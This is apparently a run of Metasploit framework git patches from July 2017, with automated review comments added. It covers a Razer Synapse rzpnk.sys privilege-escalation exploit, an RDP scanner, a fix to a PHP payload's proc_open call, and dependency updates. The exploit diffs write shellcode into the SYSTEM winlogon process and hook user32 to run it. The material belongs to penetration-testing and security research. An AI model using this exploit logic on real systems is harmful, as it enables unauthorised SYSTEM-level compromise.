@@ -1,30 +0,0 @@ -unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks - -vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first -$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil? - -begin - require 'cucumber/rake/task' - - namespace :cucumber do - Cucumber::Rake::Task.new({:boot => 'db:test:prepare'}, 'Run features that should pass') do |t| - t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. - t.fork = true # You may get faster startup if you set this to false - t.profile = 'boot' - end - Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t| - t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. - t.fork = true # You may get faster startup if you set this to false - t.profile = 'exploit' - end - - end - -rescue LoadError - desc 'cucumber rake task not available (cucumber not installed)' - task :cucumber do - abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin' - end -end - -end \ No newline at end of file diff --git a/script/cucumber b/script/cucumber deleted file mode 100755 index 7fa5c92086..0000000000 --- a/script/cucumber +++ /dev/null @@ -1,10 +0,0 @@ -#!/usr/bin/env ruby - -vendored_cucumber_bin = Dir["#{File.dirname(__FILE__)}/../vendor/{gems,plugins}/cucumber*/bin/cucumber"].first -if vendored_cucumber_bin - load File.expand_path(vendored_cucumber_bin) -else - require 'rubygems' unless ENV['NO_RUBYGEMS'] - require 'cucumber' - load Cucumber::BINARY -end From 5470670223ae9ac4bcb99e2c6caf0d082645ec1b Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 11 Jul 2017 11:19:32 -0400 Subject: [PATCH 24/63] Change the hook for windows 10 compatibility --- .../windows/local/razer_zwopenprocess.rb | 74 ++++++++++--------- 1 file changed, 41 insertions(+), 33 deletions(-) 
diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb index 177a06424b..4f25abb623 100644 --- a/modules/exploits/windows/local/razer_zwopenprocess.rb +++ b/modules/exploits/windows/local/razer_zwopenprocess.rb 
@@ -13,26 +13,29 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Local::WindowsKernel include Msf::Post::Windows::Priv + # the max size our hook can be, used before it's generated for the allocation + HOOK_STUB_MAX_LENGTH = 256 + def initialize(info = {}) super(update_info(info, - 'Name' => 'Razer Synapse rzpnk.sys IOCTL', + 'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess', 'Description' => %q{ A vulnerability exists in the latest version of Razer Synapse - (v2.20.17.302) which can be leveraged locally by a malicious application - to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The - vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver - that passes a PID specified by the user to ZwOpenProcess. This can be - issued by an application to open a handle to an arbitrary process with - the necessary privileges to allocate, read and write memory in the - specified process. + (v2.20.15.1104 as of the day of disclosure) which can be leveraged + locally by a malicious application to elevate its privileges to those of + NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler + in the rzpnk.sys driver that passes a PID specified by the user to + ZwOpenProcess. This can be issued by an application to open a handle to + an arbitrary process with the necessary privileges to allocate, read and + write memory in the specified process. This exploit leverages this vulnerability to open a handle to the winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by - installing hooks to execute attacker controlled shellcode. These hooks - are then triggered on demand by calling user32!LockWorkStation(), - resulting in the attacker's payload being executed with the privileges - of the infected winlogon process. In order for the issued IOCTL to work, - the RazerIngameEngine.exe process must not be running. This exploit will + installing a hook to execute attacker controlled shellcode. 
This hook is + then triggered on demand by calling user32!LockWorkStation(), resulting + in the attacker's payload being executed with the privileges of the + infected winlogon process. In order for the issued IOCTL to work, the + RazerIngameEngine.exe process must not be running. This exploit will check if it is, and attempt to kill it as necessary. The vulnerable software can be found here: @@ -45,20 +48,21 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => 'Spencer McIntyre', 'License' => MSF_LICENSE, 'References' => [ - ['CVE', 'CVE-2017-9769'], - #['URL', ''], + ['CVE', '2017-9769'], + ['URL', 'https://warroom.securestate.com/cve-2017-9769/'] ], 'Platform' => 'win', 'Targets' => [ # Tested on (64 bits): # * Windows 7 SP1 - # * Windows 10.0.14385 + # * Windows 10.0.10586 [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread' + 'EXITFUNC' => 'thread', + 'WfsDelay' => 20 }, 'DefaultTarget' => 0, 'Privileged' => true, 
@@ -103,42 +107,47 @@ class MetasploitModule < Msf::Exploit::Remote end pid = session.sys.process['winlogon.exe'] - print_status("Found winlogon.exe pid: #{pid}") + print_status("Found winlogon pid: #{pid}") handle = get_handle(pid) fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil? + vprint_status('Successfully opened a handle to the winlogon process') winlogon = session.sys.process.new(pid, handle) - shellcode_address = winlogon.memory.allocate(4096) + allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH + shellcode_address = winlogon.memory.allocate(allocation_size) winlogon.memory.protect(shellcode_address) - print_good("Allocated 4096 bytes in winlogon.exe at 0x#{shellcode_address.to_s(16)}") + print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}") winlogon.memory.write(shellcode_address, payload.encoded) hook_stub_address = shellcode_address + payload.encoded.length - result = session.railgun.kernel32.LoadLibraryA('winsta') - fail_with(Failure::Unknown, 'Failed to get a handle to winsta.dll') if result['return'] == 0 - winsta_handle = result['return'] + result = session.railgun.kernel32.LoadLibraryA('user32') + fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0 + user32_handle = result['return'] # resolve and backup the functions that we'll install trampolines in - winsta_trampolines = {} # address => original chunk - winsta_functions = ['_WinStationWaitForConnect', 'WinStationIsSessionRemoteable'] - winsta_functions.each do |function| - address = get_address(winsta_handle, function) + user32_trampolines = {} # address => original chunk + user32_functions = ['LockWindowStation'] + user32_functions.each do |function| + address = get_address(user32_handle, function) winlogon.memory.protect(address) - winsta_trampolines[function] = { + user32_trampolines[function] = { address: address, original: winlogon.memory.read(address, 24) } end 
# generate and install the hook asm - hook_stub = get_hook(shellcode_address, winsta_trampolines) + hook_stub = get_hook(shellcode_address, user32_trampolines) fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil? + # if this happens, there was a programming error + fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH + winlogon.memory.write(hook_stub_address, hook_stub) - vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon.exe at 0x#{hook_stub_address}") + vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}") # install the asm trampolines to jump to the hook - winsta_trampolines.each do |function, trampoline_info| + user32_trampolines.each do |function, trampoline_info| address = trampoline_info[:address] trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{ mov rax, 0x#{address.to_s(16)} @@ -147,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote jmp rax }).encode_string winlogon.memory.write(address, trampoline) - vprint_status("Installed winsta!#{address} trampoline at 0x#{address.to_s(16)}") + vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}") end session.railgun.user32.LockWorkStation() @@ -241,7 +250,6 @@ class MetasploitModule < Msf::Exploit::Remote pop r9 ret } - print_line(stub) Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string end end From 5c17f363be4185d693e2539acdd2a99eca82c39c Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 12 Jul 2017 17:29:23 -0500 Subject: [PATCH 25/63] Default opts to an empty hash instead of nil Fixes #8709 --- .../meterpreter/extensions/stdapi/fs/dir.rb | 20 +++++++---------- .../meterpreter/extensions/stdapi/fs/file.rb | 22 ++++++++----------- 2 files changed, 17 insertions(+), 25 deletions(-) 
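Review bot: The `hook_stub.length > HOOK_STUB_MAX_LENGTH` guard fires only after the region has been allocated in winlogon and `payload.encoded` has already been written into it, so that `fail_with` leaves an executable copy of the payload resident in a SYSTEM process with nothing visible releasing it. Since `get_hook` needs `shellcode_address`, the stub cannot be built before the allocation, but the failure path can free what it created: `winlogon.memory.free(shellcode_address)` (presumably available on the stdapi memory object) immediately before the `fail_with`. The same consideration applies to the `Failed to generate the hook stub` branch two lines earlier, which also runs after the payload write. The exploit method continues past the end of the hunk.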
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb index eb2550ef9b..607a030bb4 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb @@ -195,19 +195,15 @@ class Dir < Rex::Post::Dir # Downloads the contents of a remote directory a # local directory, optionally in a recursive fashion. # - def Dir.download(dst, src, opts, force = true, glob = nil, &stat) - recursive = false - continue = false - tries = false - tries_no = 0 + def Dir.download(dst, src, opts = {}, force = true, glob = nil, &stat) tries_cnt = 0 - if opts - timestamp = opts["timestamp"] - recursive = true if opts["recursive"] - continue = true if opts["continue"] - tries = true if opts["tries"] - tries_no = opts["tries_no"] - end + + continue = opts["continue"] + recursive = opts["recursive"] + timestamp = opts["timestamp"] + tries_no = opts["tries_no"] || 0 + tries = opts["tries"] + begin dir_files = self.entries(src, glob) rescue Rex::TimeoutError diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb index 72ab8bfa71..5c23bda8a2 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb @@ -301,8 +301,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO # If a block is given, it will be called before each file is downloaded and # again when each download is complete. # - def File.download(dest, src_files, opts = nil, &stat) - timestamp = opts["timestamp"] if opts + def File.download(dest, src_files, opts = {}, &stat) + timestamp = opts["timestamp"] [*src_files].each { |src| if (::File.basename(dest) != File.basename(src)) # The destination when downloading is a local file so use this 
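Review bot: Callers that still pass `nil` for `opts` explicitly (the old `Dir.download` signature had no default and guarded every read with `if opts`) now raise NoMethodError at `opts["continue"]` instead of taking the defaults, so the new default argument alone does not preserve the old tolerance; adding `opts ||= {}` as the first statement of the method does. The same pattern is dropped from `File.download` in the second hunk (`timestamp = opts["timestamp"]`), which needs the same guard. The body of `Dir.download` continues past the end of the hunk, so whether a nil-passing caller exists elsewhere is inferred, not visible.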
@@ -324,18 +324,15 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO # # Download a single file. # - def File.download_file(dest_file, src_file, opts = nil, &stat) - continue=false - tries=false - tries_no=0 + def File.download_file(dest_file, src_file, opts = {}, &stat) stat ||= lambda { |a,b,c| } - if opts - continue = true if opts["continue"] - adaptive = true if opts['adaptive'] - tries = true if opts["tries"] - tries_no = opts["tries_no"] - end + adaptive = opts["adaptive"] + block_size = opts["block_size"] || 1024 * 1024 + continue = opts["continue"] + tries_no = opts["tries_no"] + tries = opts["tries"] + src_fd = client.fs.file.new(src_file, "rb") # Check for changes @@ -373,7 +370,6 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO end # Keep transferring until EOF is reached... - block_size = (opts && opts['block_size']) || 1024 * 1024 begin if tries # resume when timeouts encountered From 833b2a67d43eb12a7da3a6c4b252f3bf9714b5a6 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 14 Jul 2017 07:06:54 -0400 Subject: [PATCH 26/63] Fix the architecture check for only x64 --- modules/exploits/windows/local/razer_zwopenprocess.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb index 4f25abb623..b7e44c6825 100644 --- a/modules/exploits/windows/local/razer_zwopenprocess.rb +++ b/modules/exploits/windows/local/razer_zwopenprocess.rb 
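Review bot: `tries_no = opts["tries_no"]` in `File.download_file` stays nil when the key is absent, whereas the matching line in `Dir.download` in this same commit defaults it with `|| 0`; if the retry loop further down compares a counter against it, the nil would surface as an ArgumentError only on the timeout path, the one path that is hardest to test. Use `tries_no = opts["tries_no"] || 0` for consistency, and `opts ||= {}` at the top for callers that still pass nil explicitly. `download_file` continues past the end of the hunk.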
@@ -92,10 +92,8 @@ class MetasploitModule < Msf::Exploit::Remote if sysinfo['Architecture'] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') - elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 - fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') - elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 - fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + elsif sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported') end pid = session.sys.process['RazerIngameEngine.exe'] From e3e5c33b9bc9a799bd9b018f7ac003cb964906fa Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Fri, 14 Jul 2017 13:02:43 -0700 Subject: [PATCH 27/63] WIP commit of RDP scanner --- modules/auxiliary/scanner/rdp/rdp_scanner.rb | 75 ++++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 modules/auxiliary/scanner/rdp/rdp_scanner.rb diff --git a/modules/auxiliary/scanner/rdp/rdp_scanner.rb b/modules/auxiliary/scanner/rdp/rdp_scanner.rb new file mode 100644 index 0000000000..a5a7637826 --- /dev/null +++ b/modules/auxiliary/scanner/rdp/rdp_scanner.rb 
@@ -0,0 +1,75 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Identify endpoints speaking the Remote Desktop Protocol (RDP)', + 'Description' => %q( + This module attempts to connect to the specified Remote Desktop Protocol port + and determines if it speaks RDP. + ), + 'Author' => 'Jon Hart ', + 'References' => + [ + ], + 'License' => MSF_LICENSE + ) + ) + + register_options( + [ + Opt::RPORT(3389) + # XXX: add options to turn on/off TLS, CredSSP, early user, cookies, etc. + ] + ) + end + + # simple TPKT v3 + x.224 COTP Connect Request + RDP negotiation request with TLS and CredSSP requested + RDP_PROBE = "\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00" + # any TPKT v3 + x.2224 COTP Connect Confirm + RDP_RE = /^\x03\x00.{3}\xd0.{7}.*$/ + def rdp? + sock.put(RDP_PROBE) + response = sock.get_once(-1) + if response + if RDP_RE.match?(response) + # XXX: it might be helpful to decode the response and show what was selected. + print_good("Identified RDP") + return true + else + vprint_status("No match for '#{Rex::Text.to_hex_ascii(response)}'") + end + else + vprint_status("No response") + end + end + + def run_host(_ip) + begin + connect + return unless rdp? + rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \ + ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e + vprint_error("error while connecting and negotiating RDP: #{e}") + return + ensure + disconnect + end + + service = report_service( + host: rhost, + port: rport, + proto: 'tcp', + name: 'RDP' + ) + end +end From b4813ce2c7fb72732377c85c033856886c861e89 Mon Sep 17 00:00:00 2001 
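Review bot: `RDP_RE` is matched against raw wire bytes but is written as a text regex: `.` does not cross a 0x0a byte and `^`/`$` match at an embedded newline, so a Connect Confirm whose reference fields happen to contain 0x0a is reported as "No match". Going by the bytes in `RDP_PROBE`, a COTP CC carries only five bytes after the 0xd0 type octet (dst-ref, src-ref, class), so the `.{7}` requirement also rejects a bare CC with no RDP_NEG_RSP appended, which is what a server that does not support negotiation presumably returns — contradicting the comment "any TPKT v3 + COTP Connect Confirm". Anchoring on the header only, with the binary flags, covers both: `RDP_RE = /\A\x03\x00.{3}\xd0/nm`. The `service = report_service(...)` assignment in `run_host` is never read and can be dropped.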
From: Spencer McIntyre Date: Sat, 15 Jul 2017 14:48:54 -0400 Subject: [PATCH 28/63] Update the pre-exploit check conditions --- .../windows/local/razer_zwopenprocess.rb | 31 ++++++++++++------- 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb index b7e44c6825..2bbf3cb827 100644 --- a/modules/exploits/windows/local/razer_zwopenprocess.rb +++ b/modules/exploits/windows/local/razer_zwopenprocess.rb @@ -70,15 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote end def check - pid = session.sys.process['RazerIngameEngine.exe'] - session.sys.process.kill(pid) unless pid.nil? + # Validate that the driver has been loaded and that + # the version is the same as the one expected + client.sys.config.getdrivers.each do |d| + if d[:basename].downcase == 'rzpnk.sys' + expected_checksum = 'b4598c05d5440250633e25933fff42b0' + target_checksum = client.fs.file.md5(d[:filename]) - pid = session.sys.process['winlogon.exe'] - handle = get_handle(pid) - return Exploit::CheckCode::Safe if handle.nil? + if expected_checksum == Rex::Text.to_hex(target_checksum, '') + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected + end + end + end - session.railgun.kernel32.CloseHandle(handle) - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Safe end def exploit 
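Review bot: `client.fs.file.md5(d[:filename])` in the new `check` is unguarded; driver paths reported by `getdrivers` are presumably in NT form (`\SystemRoot\...`) and if the stdapi file API cannot open that path the call raises and `check` aborts instead of reporting, even though the driver being loaded is already the detectable condition. Wrap the md5 call in `begin`/`rescue Rex::Post::Meterpreter::RequestError` and return `Exploit::CheckCode::Detected` from the rescue. A comment on the constant, e.g. `# MD5 of rzpnk.sys from Synapse v2.20.15.1104; other builds report Detected, not Appears`, would make it clear that the single hash is a fingerprint of one build rather than a vulnerability test.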
@@ -90,14 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') end - if sysinfo['Architecture'] =~ /wow64/i - fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') - elsif sysinfo['Architecture'] == ARCH_X86 - fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported') + if session.platform != 'windows' + fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') + elsif session.arch != ARCH_X64 + fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets') end pid = session.sys.process['RazerIngameEngine.exe'] - unless pid.nil? + if pid # if this process is running, the IOCTL won't work but the process runs # with user privileges so we can kill it print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") From 62615298e14a1bca11edb62abf17e924508a7e1e Mon Sep 17 00:00:00 2001 From: jvoisin Date: Sun, 16 Jul 2017 15:20:30 +0200 Subject: [PATCH 29/63] Fix a php warning This should close #8670 --- lib/msf/core/payload/php.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload/php.rb b/lib/msf/core/payload/php.rb index 7c26b2c721..bf5190cde9 100644 --- a/lib/msf/core/payload/php.rb +++ b/lib/msf/core/payload/php.rb @@ -103,7 +103,7 @@ module Msf::Payload::Php }else" proc_open = " if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){ - $handle=proc_open(#{cmd},array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); + $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); #{output}=NULL; while(!feof($pipes[1])){ #{output}.=fread($pipes[1],1024); From 7d6992c0e80cbc93e85452ea4432ab05078d32db Mon Sep 17 00:00:00 2001 
From: Christian Mehlmauer Date: Mon, 17 Jul 2017 09:58:20 +0200 Subject: [PATCH 30/63] respect windows --- lib/msf/util.rb | 1 + lib/msf/util/helper.rb | 19 +++++++++++++++++++ metasploit-framework.gemspec | 3 +-- 3 files changed, 21 insertions(+), 2 deletions(-) create mode 100644 lib/msf/util/helper.rb diff --git a/lib/msf/util.rb b/lib/msf/util.rb index 7439f57d30..4944e330e9 100644 --- a/lib/msf/util.rb +++ b/lib/msf/util.rb @@ -21,3 +21,4 @@ end # Executable generation and encoding require 'msf/util/exe' +require 'msf/util/helper' diff --git a/lib/msf/util/helper.rb b/lib/msf/util/helper.rb new file mode 100644 index 0000000000..b5823db870 --- /dev/null +++ b/lib/msf/util/helper.rb @@ -0,0 +1,19 @@ +# -*- coding: binary -*- + +module Msf +module Util +class Helper + # Cross-platform way of finding an executable in the $PATH. + # + # which('ruby') #=> /usr/bin/ruby + def self.which(cmd) + exts = ENV['PATHEXT'] ? ENV['PATHEXT'].split(';') : [''] + ENV['PATH'].split(File::PATH_SEPARATOR).each do |path| + exts.each { |ext| + exe = File.join(path, "#{cmd}#{ext}") + return exe if File.executable?(exe) && !File.directory?(exe) + } + end + return nil + end +end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index cb1e8596af..0eb56d5ff5 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -25,8 +25,7 @@ Gem::Specification.new do |spec| spec.license = 'BSD-3-clause' # only do a git ls-files if the .git folder exists and we have a git binary in PATH - if File.directory?(File.join(File.dirname(__FILE__), ".git")) && - ENV['PATH'].split(':').collect {|d| Dir.entries d if Dir.exists? d}.flatten.include?("git") + if File.directory?(File.join(File.dirname(__FILE__), ".git")) && Msf::Util::Helper.which("git") spec.files = `git ls-files`.split($/).reject { |file| file =~ /^documentation|^external/ } From 3c7d6c3a6a25e35eab3c4641e83a4f5ecb0daf7d Mon Sep 17 00:00:00 2001 
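Review bot: `ENV['PATH'].split(File::PATH_SEPARATOR)` in `which` raises NoMethodError when PATH is unset, and an empty PATH element (`::`, meaning the current directory on Unix) becomes `File.join('', "#{cmd}#{ext}")`, i.e. `/git`, a root-relative path that was never intended. Use `ENV.fetch('PATH', '').split(File::PATH_SEPARATOR)` and either skip empty entries or expand them with `File.expand_path`. Since the gemspec hunk uses this result to decide whether to shell out to `git ls-files`, a line in the header comment such as `# Trusts every PATH entry; only File.executable? is checked, not ownership or write bits.` would make the trust boundary explicit.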
From: Christian Mehlmauer Date: Mon, 17 Jul 2017 10:10:12 +0200 Subject: [PATCH 31/63] fixed some bugs --- lib/msf/util/helper.rb | 2 ++ metasploit-framework.gemspec | 1 + 2 files changed, 3 insertions(+) diff --git a/lib/msf/util/helper.rb b/lib/msf/util/helper.rb index b5823db870..82b72c9491 100644 --- a/lib/msf/util/helper.rb +++ b/lib/msf/util/helper.rb @@ -17,3 +17,5 @@ class Helper return nil end end +end +end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 0eb56d5ff5..1e71b756d9 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -13,6 +13,7 @@ end $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'metasploit/framework/version' require 'metasploit/framework/rails_version_constraint' +require 'msf/util/helper' Gem::Specification.new do |spec| spec.name = 'metasploit-framework' From ea025583902eef0a58e6510ad9502a16b1a58822 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 17 Jul 2017 09:26:14 -0500 Subject: [PATCH 32/63] bump prerelease gems to fix specific issues with Framework rb-readline has an issue with the latest curses release dnsruby changes the global thread behavior to abort on exception --- Gemfile | 6 ++++++ Gemfile.lock | 16 ++++++++++++++-- 2 files changed, 20 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 4dbdbacb6d..26b82335ed 100755 --- a/Gemfile +++ b/Gemfile @@ -3,6 +3,12 @@ source 'https://rubygems.org' # spec.add_runtime_dependency '', [] gemspec name: 'metasploit-framework' +# These pull in pre-release gems in order to fix specific issues. +# XXX https://github.com/alexdalitz/dnsruby/pull/134 +gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby' +# XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970 +gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' + # separate from test as simplecov is not run on travis-ci group :coverage do # code coverage for tests 
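Review bot: Both `git:` sources in the Gemfile are declared without a `ref:` (or `tag:`), so the only thing holding them to the reviewed commits is Gemfile.lock; a `bundle update dnsruby` or any checkout that does not carry the lockfile pulls whatever the upstream default branch holds at that moment, which is an unreviewed remote write into the framework's dependency set. Pin to the commits the lockfile in the next hunk already records: `gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby', ref: '09c3890ccfaedb7fd4951f56575d5c53651e0140'` and `gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline', ref: 'fd882edcd145c26681f9971be5f6675c7f6d1970'`. The XXX comments already name the upstream fixes, so the explicit pins carry the same intent without relying on the lockfile.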
diff --git a/Gemfile.lock b/Gemfile.lock index 68976ee3b4..aa6a6fe5ef 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,3 +1,15 @@ +GIT + remote: https://github.com/ConnorAtherton/rb-readline + revision: fd882edcd145c26681f9971be5f6675c7f6d1970 + specs: + rb-readline (0.5.4) + +GIT + remote: https://github.com/alexdalitz/dnsruby + revision: 09c3890ccfaedb7fd4951f56575d5c53651e0140 + specs: + dnsruby (1.60.1) + PATH remote: . specs: @@ -109,7 +121,6 @@ GEM builder (3.2.3) coderay (1.1.1) diff-lcs (1.3) - dnsruby (1.60.1) docile (1.1.5) erubis (2.7.0) factory_girl (4.8.0) @@ -234,7 +245,6 @@ GEM rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) rake (12.0.0) - rb-readline (0.5.4) recog (2.1.11) nokogiri redcarpet (3.4.0) @@ -350,6 +360,7 @@ PLATFORMS ruby DEPENDENCIES + dnsruby! factory_girl_rails fivemat metasploit-aggregator @@ -357,6 +368,7 @@ DEPENDENCIES octokit pry rake + rb-readline! redcarpet rspec-rails rspec-rerun From 3a8f7cbabefaaf571324b2d9413c67ae4f8a9716 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 17 Jul 2017 09:41:47 -0500 Subject: [PATCH 33/63] git is really needed in docker too --- docker/Dockerfile | 1 + 1 file changed, 1 insertion(+) diff --git a/docker/Dockerfile b/docker/Dockerfile index 52eb6cadfd..e271fc8589 100644 --- a/docker/Dockerfile +++ b/docker/Dockerfile @@ -35,6 +35,7 @@ RUN apk update && \ yaml-dev \ zlib-dev \ ncurses-dev \ + git \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && bundle install --system $BUNDLER_ARGS \ && apk del .ruby-builddeps \ From d77e9acec055909d656228e340771b6ca24c86e3 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 17 Jul 2017 09:56:18 -0500 Subject: [PATCH 34/63] libffi is no longer needed --- docker/Dockerfile | 1 - 1 file changed, 1 deletion(-) diff --git a/docker/Dockerfile b/docker/Dockerfile index e271fc8589..d6e56029c8 100644 --- a/docker/Dockerfile +++ b/docker/Dockerfile 
@@ -24,7 +24,6 @@ RUN apk update && \ bison \ build-base \ ruby-dev \ - libffi-dev\ openssl-dev \ readline-dev \ sqlite-dev \ From f80c0531147d05f24c5071868efe880c89dfa517 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 17 Jul 2017 12:01:22 -0700 Subject: [PATCH 35/63] Bump version of framework to 4.15.2 --- Gemfile.lock | 6 +++--- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index aa6a6fe5ef..037a6ff9f1 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ GIT PATH remote: . specs: - metasploit-framework (4.15.1) + metasploit-framework (4.15.2) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -274,7 +274,7 @@ GEM rex-arch rex-ole (0.1.6) rex-text - rex-powershell (0.1.72) + rex-powershell (0.1.73) rex-random_identifier rex-text rex-random_identifier (0.1.2) @@ -377,4 +377,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.15.1 + 1.15.2 diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index ad726fc009..6321a6f85e 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.15.1" + VERSION = "4.15.2" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From ecce28e8b9106f98203cfbf1b675d7563081e4ee Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 17 Jul 2017 15:04:43 -0500 Subject: [PATCH 36/63] revert rex-powershell back to previous version some things need to be worked out in framework before this gem version is ready for release --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 037a6ff9f1..50c131934e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -274,7 +274,7 @@ GEM rex-arch rex-ole (0.1.6) rex-text - rex-powershell (0.1.73) + rex-powershell (0.1.72) rex-random_identifier rex-text rex-random_identifier (0.1.2) 
From 43e04c889483a911b11d0f60763a1511af417a51 Mon Sep 17 00:00:00 2001
From: Jon Hart
Date: Mon, 17 Jul 2017 13:14:47 -0700
Subject: [PATCH 37/63] Improve RDP probe packet
---
 modules/auxiliary/scanner/rdp/rdp_scanner.rb | 41 +++++++++++++++++---
 1 file changed, 35 insertions(+), 6 deletions(-)
